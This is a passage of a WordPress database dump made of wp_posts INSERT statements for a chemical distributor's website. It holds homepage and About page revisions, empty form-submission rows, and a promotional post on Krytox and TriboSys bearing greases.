INSERT INTO `wp_posts` VALUES (3493, 2, '2017-01-19 20:40:59', '2017-01-19 20:40:59', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-01-19 20:40:59', '2017-01-19 20:40:59', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3494, 0, '2017-01-19 21:25:35', '2017-01-19 21:25:35', '', '', '', 'publish', 'closed', 'closed', '', '3494', '', '', '2017-01-19 21:25:35', '2017-01-19 21:25:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/3494/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3495, 0, '2017-01-19 21:45:38', '2017-01-19 21:45:38', '', '', '', 'publish', 'closed', 'closed', '', '3495', '', '', '2017-01-19 21:45:38', '2017-01-19 21:45:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/3495/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3496, 0, '2017-01-19 22:45:30', '2017-01-19 22:45:30', '', '', '', 'publish', 'closed', 'closed', '', '3496', '', '', '2017-01-19 22:45:30', '2017-01-19 22:45:30', '', 0, 'https://www.miller-stephenson.com/nf_sub/3496/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3497, 0, '2017-01-20 14:48:44', '2017-01-20 14:48:44', '', '', '', 'publish', 'closed', 'closed', '', '3497', '', '', '2017-01-20 14:48:44', '2017-01-20 14:48:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/3497/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3498, 0, '2017-01-20 15:07:32', '2017-01-20 15:07:32', '', '', '', 'publish', 'closed', 'closed', '', '3498', '', '', '2017-01-20 15:07:33', '2017-01-20 15:07:33', '', 0, 'https://www.miller-stephenson.com/nf_sub/3498/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3499, 0, '2017-01-20 15:32:27', '2017-01-20 15:32:27', '', '', '', 'publish', 'closed', 'closed', '', '3499', '', '', '2017-01-20 15:32:27', '2017-01-20 15:32:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/3499/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3500, 0, '2017-01-21 21:57:47', '2017-01-21 21:57:47', '', '', '', 'publish', 'closed', 'closed', '', '3500', '', '', '2017-01-21 21:57:48', '2017-01-21 21:57:48', '', 0, 'https://www.miller-stephenson.com/nf_sub/3500/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3501, 0, '2017-01-23 13:09:22', '2017-01-23 13:09:22', '', '', '', 'publish', 'closed', 'closed', '', '3501', '', '', '2017-01-23 13:09:22', '2017-01-23 13:09:22', '', 0, 'https://www.miller-stephenson.com/nf_sub/3501/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3502, 0, '2017-01-23 15:45:05', '2017-01-23 15:45:05', '', '', '', 'publish', 'closed', 'closed', '', '3502', '', '', '2017-01-23 15:45:05', '2017-01-23 15:45:05', '', 0, 'https://www.miller-stephenson.com/nf_sub/3502/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3503, 0, '2017-01-23 22:12:23', '2017-01-23 22:12:23', '', '', '', 'publish', 'closed', 'closed', '', '3503', '', '', '2017-01-23 22:12:24', '2017-01-23 22:12:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/3503/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3504, 0, '2017-01-23 23:49:23', '2017-01-23 23:49:23', '', '', '', 'publish', 'closed', 'closed', '', '3504', '', '', '2017-01-23 23:49:23', '2017-01-23 23:49:23', '', 0, 'https://www.miller-stephenson.com/nf_sub/3504/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3505, 0, '2017-01-24 08:36:35', '2017-01-24 08:36:35', '', '', '', 'publish', 'closed', 'closed', '', '3505', '', '', '2017-01-24 08:36:35', '2017-01-24 08:36:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/3505/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3506, 0, '2017-01-24 10:08:26', '2017-01-24 10:08:26', '', '', '', 'publish', 'closed', 'closed', '', '3506', '', '', '2017-01-24 10:08:27', '2017-01-24 10:08:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/3506/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3507, 0, '2017-01-24 15:03:10', '2017-01-24 15:03:10', '', '', '', 'publish', 'closed', 'closed', '', '3507', '', '', '2017-01-24 15:03:11', '2017-01-24 15:03:11', '', 0, 'https://www.miller-stephenson.com/nf_sub/3507/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3508, 0, '2017-01-24 15:47:02', '2017-01-24 15:47:02', '', '', '', 'publish', 'closed', 'closed', '', '3508', '', '', '2017-01-24 15:47:02', '2017-01-24 15:47:02', '', 0, 'https://www.miller-stephenson.com/nf_sub/3508/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3509, 0, '2017-01-24 16:30:24', '2017-01-24 16:30:24', '', '', '', 'publish', 'closed', 'closed', '', '3509', '', '', '2017-01-24 16:30:24', '2017-01-24 16:30:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/3509/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3511, 0, '2017-01-24 17:43:16', '2017-01-24 17:43:16', '', '', '', 'publish', 'closed', 'closed', '', '3511', '', '', '2017-01-24 17:43:16', '2017-01-24 17:43:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3511/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3512, 2, '2017-01-24 18:59:19', '0000-00-00 00:00:00', 'Miller-Stephenson carries a variety of Flux Removers', 'Miller-Stephenson Flux Removers', '', 'draft', 'closed', 'closed', '', '', '', '', '2017-01-24 18:59:19', '2017-01-24 18:59:19', '', 0, 'https://www.miller-stephenson.com/?p=3512', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (3513, 0, '2017-01-24 20:04:40', '2017-01-24 20:04:40', '', '', '', 'publish', 'closed', 'closed', '', '3513', '', '', '2017-01-24 20:04:40', '2017-01-24 20:04:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/3513/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3514, 0, '2017-01-24 22:06:16', '2017-01-24 22:06:16', '', '', '', 'publish', 'closed', 'closed', '', '3514', '', '', '2017-01-24 22:06:16', '2017-01-24 22:06:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3514/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3515, 0, '2017-01-24 22:23:02', '2017-01-24 22:23:02', '', '', '', 'publish', 'closed', 'closed', '', '3515', '', '', '2017-01-24 22:23:02', '2017-01-24 22:23:02', '', 0, 'https://www.miller-stephenson.com/nf_sub/3515/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3516, 0, '2017-01-25 19:31:57', '2017-01-25 19:31:57', '', '', '', 'publish', 'closed', 'closed', '', '3516', '', '', '2017-01-25 19:31:57', '2017-01-25 19:31:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/3516/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3517, 0, '2017-01-25 19:32:20', '2017-01-25 19:32:20', '', '', '', 'publish', 'closed', 'closed', '', '3517', '', '', '2017-01-25 19:32:20', '2017-01-25 19:32:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/3517/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3518, 0, '2017-01-25 19:55:55', '2017-01-25 19:55:55', '', '', '', 'publish', 'closed', 'closed', '', '3518', '', '', '2017-01-25 19:55:55', '2017-01-25 19:55:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/3518/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3519, 0, '2017-01-25 20:03:17', '2017-01-25 20:03:17', '', '', '', 'publish', 'closed', 'closed', '', '3519', '', '', '2017-01-25 20:03:17', '2017-01-25 20:03:17', '', 0, 'https://www.miller-stephenson.com/nf_sub/3519/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3521, 0, '2017-01-26 07:44:47', '2017-01-26 07:44:47', '', '', '', 'publish', 'closed', 'closed', '', '3521', '', '', '2017-01-26 07:44:48', '2017-01-26 07:44:48', '', 0, 'https://www.miller-stephenson.com/nf_sub/3521/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3522, 0, '2017-01-26 07:46:47', '2017-01-26 07:46:47', '', '', '', 'publish', 'closed', 'closed', '', '3522', '', '', '2017-01-26 07:46:48', '2017-01-26 07:46:48', '', 0, 'https://www.miller-stephenson.com/nf_sub/3522/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3523, 0, '2017-01-26 11:49:16', '2017-01-26 11:49:16', '', '', '', 'publish', 'closed', 'closed', '', '3523', '', '', '2017-01-26 11:49:17', '2017-01-26 11:49:17', '', 0, 'https://www.miller-stephenson.com/nf_sub/3523/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3524, 2, '2017-01-27 20:58:23', '0000-00-00 00:00:00', '<h3><strong>The Perfect Bearing Grease</strong></h3>\r\nAt Miller-Stephenson we understand our customers needs for a good bearing grease that will enhance the life of the bearing. We understand the irritation it causes when a bearing constantly fails due to a poor grease. We have solved the lubrication needs of thousands of customers worldwide.\r\n\r\nMiller-Stephenson carries <a href="https://www.miller-stephenson.com/krytox/">Krytox™</a> lubricants, <a href="https://www.miller-stephenson.com/chemicals/lubricants/tribosys-lubricants/oils-greases/">TriboSys™</a> lubricants and <a href="https://www.miller-stephenson.com/chemicals/lubricants/teflon-lubricants/">DuPont™ Teflon</a> Lubricants. Miller-Stephenson is most renowned for distributing Krytox™ lubricants from Chemours formerly known as DuPont. As a direct channel partner of Chemours with a technical team with over 25 years experience with Krytox™ lubricants. Krytox™ oils are made from fluorine, carbon and oxygen - a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). TriboSys™ lubricants are Miller-Stephenson’s exclusive line of industrial, medical, and food-grade lubricant. Our lubricant offer superior lubricity and longevity while minimizing wear and heat generation. Teflon Lubricant: DuPont™ series of industrial and commercial lubricants which are fortified with polytetrafluorethylene (PTFE) and other proprietary additives. These formulations offer robust performance versus standard hydrocarbon and silicone oil based lubricant.\r\n<h4><strong>Krytox™ Bearing Grease</strong></h4>\r\nKrytox™ fluorinated lubricants are ideal for bearings that come into contact with chemicals, seal barrier fluids, instruments and oxygen systems. Krytox™ lubricants are also for applications where an <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">H-1 Incidental Food Contact Cerification</a> is required. Krytox™ bearing greases serve the needs of many industries including <a href="https://www.miller-stephenson.com/krytox-automotive-bearing-lubrication/">Automotive</a>, <a href="https://www.miller-stephenson.com/krytox-aviation/">Aviation</a>, <a href="https://www.miller-stephenson.com/krytox-for-injection-molding/">Injection Molding</a>, <a href="https://www.miller-stephenson.com/krytox-tm7-tire-mold-industry/">Tire Molding</a>, and many more. Krytox™ bearing greases are used in extreme conditions, such as continuous high temperatures up to 288°C (550 °F), and higher temperatures for shorter periods, depending on product grade limits. These greases do not burn or combust, even in 100% liquid or gaseous oxygen environments. In most applications Krytox™ greases deliver low temperature starting performance while maintaining efficiency at higher temperatures.\r\n\r\nFurthermore we offer these Krytox™ bearing greases in an aerosolized can and can be found <a href="https://www.miller-stephenson.com/product/tribosys-110xnb-copy/">here.</a>\r\n\r\nImportant information regarding Krytox™:\r\n<p class="entry-title"><a href="https://www.miller-stephenson.com/krytox-prepare-bearings/">How to Prepare Bearings with Krytox™ Lubricants</a></p>\r\n<p class="entry-title"><a href="https://www.miller-stephenson.com/krytox-faq/">Krytox FAQ</a></p>\r\n<p class="entry-title"><a href="https://www.miller-stephenson.com/krytox-equipment-selection/">Krytox – Equipment Selection for Applying Krytox™ Lubricants</a></p>\r\n<p class="entry-title"><a href="https://www.miller-stephenson.com/krytox-product-selection-guide/">Krytox Product Selection Guide</a></p>\r\n<p class="entry-title"><strong>TriboSys™ Bearing Grease</strong></p>\r\nTriboSys™ bearing greases are a family of synthetically blended greases formulated for a wide range of applications and for extreme speeds, temperature and pressure. TriboSys™ greases are offered for a wide range of bearings\r\n\r\nTriboSys™ 2210G has high quality fluids with an inorganic thickener to produce excellent temperature stability.\r\n\r\n<strong>Advantages</strong>\r\n<ul>\r\n 	<li>Extends Lube Cycles</li>\r\n 	<li>Extends Bearing and Shaft Life</li>\r\n 	<li>Good for All Bearing Design</li>\r\n</ul>\r\nTo find out more about: <a href="https://www.miller-stephenson.com/product/tribosys-221x-general-purpose-greases/">TriboSys™ 221X Series</a>\r\n\r\n&nbsp;', 'The Perfect Bearing Grease', '', 'draft', 'closed', 'closed', '', 'bearing-grease-lubricant', '', '', '2017-01-27 20:58:23', '2017-01-27 20:58:23', '', 0, 'https://www.miller-stephenson.com/?p=3524', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (3525, 2, '2017-01-27 20:58:23', '2017-01-27 20:58:23', '<h3><strong>The Perfect Bearing Grease</strong></h3>\r\nAt Miller-Stephenson we understand our customers needs for a good bearing grease that will enhance the life of the bearing. We understand the irritation it causes when a bearing constantly fails due to a poor grease. We have solved the lubrication needs of thousands of customers worldwide.\r\n\r\nMiller-Stephenson carries <a href="https://www.miller-stephenson.com/krytox/">Krytox™</a> lubricants, <a href="https://www.miller-stephenson.com/chemicals/lubricants/tribosys-lubricants/oils-greases/">TriboSys™</a> lubricants and <a href="https://www.miller-stephenson.com/chemicals/lubricants/teflon-lubricants/">DuPont™ Teflon</a> Lubricants. Miller-Stephenson is most renowned for distributing Krytox™ lubricants from Chemours formerly known as DuPont. As a direct channel partner of Chemours with a technical team with over 25 years experience with Krytox™ lubricants. Krytox™ oils are made from fluorine, carbon and oxygen - a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). TriboSys™ lubricants are Miller-Stephenson’s exclusive line of industrial, medical, and food-grade lubricant. Our lubricant offer superior lubricity and longevity while minimizing wear and heat generation. Teflon Lubricant: DuPont™ series of industrial and commercial lubricants which are fortified with polytetrafluorethylene (PTFE) and other proprietary additives. These formulations offer robust performance versus standard hydrocarbon and silicone oil based lubricant.\r\n<h4><strong>Krytox™ Bearing Grease</strong></h4>\r\nKrytox™ fluorinated lubricants are ideal for bearings that come into contact with chemicals, seal barrier fluids, instruments and oxygen systems. Krytox™ lubricants are also for applications where an <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">H-1 Incidental Food Contact Cerification</a> is required. Krytox™ bearing greases serve the needs of many industries including <a href="https://www.miller-stephenson.com/krytox-automotive-bearing-lubrication/">Automotive</a>, <a href="https://www.miller-stephenson.com/krytox-aviation/">Aviation</a>, <a href="https://www.miller-stephenson.com/krytox-for-injection-molding/">Injection Molding</a>, <a href="https://www.miller-stephenson.com/krytox-tm7-tire-mold-industry/">Tire Molding</a>, and many more. Krytox™ bearing greases are used in extreme conditions, such as continuous high temperatures up to 288°C (550 °F), and higher temperatures for shorter periods, depending on product grade limits. These greases do not burn or combust, even in 100% liquid or gaseous oxygen environments. In most applications Krytox™ greases deliver low temperature starting performance while maintaining efficiency at higher temperatures.\r\n\r\nFurthermore we offer these Krytox™ bearing greases in an aerosolized can and can be found <a href="https://www.miller-stephenson.com/product/tribosys-110xnb-copy/">here.</a>\r\n\r\nImportant information regarding Krytox™:\r\n<p class="entry-title"><a href="https://www.miller-stephenson.com/krytox-prepare-bearings/">How to Prepare Bearings with Krytox™ Lubricants</a></p>\r\n<p class="entry-title"><a href="https://www.miller-stephenson.com/krytox-faq/">Krytox FAQ</a></p>\r\n<p class="entry-title"><a href="https://www.miller-stephenson.com/krytox-equipment-selection/">Krytox – Equipment Selection for Applying Krytox™ Lubricants</a></p>\r\n<p class="entry-title"><a href="https://www.miller-stephenson.com/krytox-product-selection-guide/">Krytox Product Selection Guide</a></p>\r\n<p class="entry-title"><strong>TriboSys™ Bearing Grease</strong></p>\r\nTriboSys™ bearing greases are a family of synthetically blended greases formulated for a wide range of applications and for extreme speeds, temperature and pressure. TriboSys™ greases are offered for a wide range of bearings\r\n\r\nTriboSys™ 2210G has high quality fluids with an inorganic thickener to produce excellent temperature stability.\r\n\r\n<strong>Advantages</strong>\r\n<ul>\r\n 	<li>Extends Lube Cycles</li>\r\n 	<li>Extends Bearing and Shaft Life</li>\r\n 	<li>Good for All Bearing Design</li>\r\n</ul>\r\nTo find out more about: <a href="https://www.miller-stephenson.com/product/tribosys-221x-general-purpose-greases/">TriboSys™ 221X Series</a>\r\n\r\n&nbsp;', 'The Perfect Bearing Grease', '', 'inherit', 'closed', 'closed', '', '3524-revision-v1', '', '', '2017-01-27 20:58:23', '2017-01-27 20:58:23', '', 3524, 'https://www.miller-stephenson.com/3524-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3527, 0, '2017-01-27 21:46:18', '2017-01-27 21:46:18', '', '', '', 'publish', 'closed', 'closed', '', '3527', '', '', '2017-01-27 21:46:18', '2017-01-27 21:46:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/3527/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3529, 0, '2017-01-30 13:49:33', '2017-01-30 13:49:33', '', '', '', 'publish', 'closed', 'closed', '', '3529', '', '', '2017-01-30 13:49:33', '2017-01-30 13:49:33', '', 0, 'https://www.miller-stephenson.com/nf_sub/3529/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3530, 0, '2017-01-30 19:48:21', '2017-01-30 19:48:21', '', '', '', 'publish', 'closed', 'closed', '', '3530', '', '', '2017-01-30 19:48:22', '2017-01-30 19:48:22', '', 0, 'https://www.miller-stephenson.com/nf_sub/3530/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3531, 0, '2017-01-30 20:06:43', '2017-01-30 20:06:43', '', '', '', 'publish', 'closed', 'closed', '', '3531', '', '', '2017-01-30 20:06:44', '2017-01-30 20:06:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/3531/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3532, 0, '2017-01-30 20:11:08', '2017-01-30 20:11:08', '', '', '', 'publish', 'closed', 'closed', '', '3532', '', '', '2017-01-30 20:11:08', '2017-01-30 20:11:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/3532/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3533, 0, '2017-01-31 15:18:43', '2017-01-31 15:18:43', '', '', '', 'publish', 'closed', 'closed', '', '3533', '', '', '2017-01-31 15:18:43', '2017-01-31 15:18:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/3533/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3534, 0, '2017-01-31 16:29:51', '2017-01-31 16:29:51', '', '', '', 'publish', 'closed', 'closed', '', '3534', '', '', '2017-01-31 16:29:52', '2017-01-31 16:29:52', '', 0, 'https://www.miller-stephenson.com/nf_sub/3534/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3535, 0, '2017-01-31 17:31:32', '2017-01-31 17:31:32', '', '', '', 'publish', 'closed', 'closed', '', '3535', '', '', '2017-01-31 17:31:33', '2017-01-31 17:31:33', '', 0, 'https://www.miller-stephenson.com/nf_sub/3535/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3536, 0, '2017-01-31 19:01:14', '2017-01-31 19:01:14', '', '', '', 'publish', 'closed', 'closed', '', '3536', '', '', '2017-01-31 19:01:14', '2017-01-31 19:01:14', '', 0, 'https://www.miller-stephenson.com/nf_sub/3536/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3537, 0, '2017-01-31 21:24:20', '2017-01-31 21:24:20', '', '', '', 'publish', 'closed', 'closed', '', '3537', '', '', '2017-01-31 21:24:20', '2017-01-31 21:24:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/3537/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3538, 2, '2017-02-01 13:56:20', '2017-02-01 13:56:20', '[row]\r\n\r\n[col span="6"]\r\n\r\n<strong>On The Cutting Edge of the Performance Chemical Market</strong>\r\n\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.\r\n\r\n[/col]\r\n[col span="5"]\r\n\r\nhttps://www.youtube.com/watch?v=tbzqYPsuauI&feature=youtu.be\r\n\r\n[/col]\r\n[col]\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\nLooking back at over 60 years of success, Miller-Stephenson provides superior chemical solutions for a wide range of industries. We are committed to providing customers with industry-leading customer service, delivery and technical support to ensure our customers are successful. We strategically maintain four facilities throughout the United States and Canada to ensure prompt customer service and efficient delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Customer Service Department.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4"]\r\n\r\n[ux_image id="1054"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2017-02-01 13:56:20', '2017-02-01 13:56:20', '', 204, 'https://www.miller-stephenson.com/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3539, 2, '2017-02-01 13:57:18', '2017-02-01 13:57:18', '[row]\r\n\r\n[col span="3"]\r\n\r\n<strong>On The Cutting Edge of the Performance Chemical Market</strong>\r\n\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.\r\n\r\n[/col]\r\n[col span="6"]\r\n\r\nhttps://www.youtube.com/watch?v=tbzqYPsuauI&feature=youtu.be\r\n\r\n[/col]\r\n[col]\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\nLooking back at over 60 years of success, Miller-Stephenson provides superior chemical solutions for a wide range of industries. We are committed to providing customers with industry-leading customer service, delivery and technical support to ensure our customers are successful. We strategically maintain four facilities throughout the United States and Canada to ensure prompt customer service and efficient delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Customer Service Department.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4"]\r\n\r\n[ux_image id="1054"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2017-02-01 13:57:18', '2017-02-01 13:57:18', '', 204, 'https://www.miller-stephenson.com/204-revision-v1/', 0, 'revision', '', 0); 
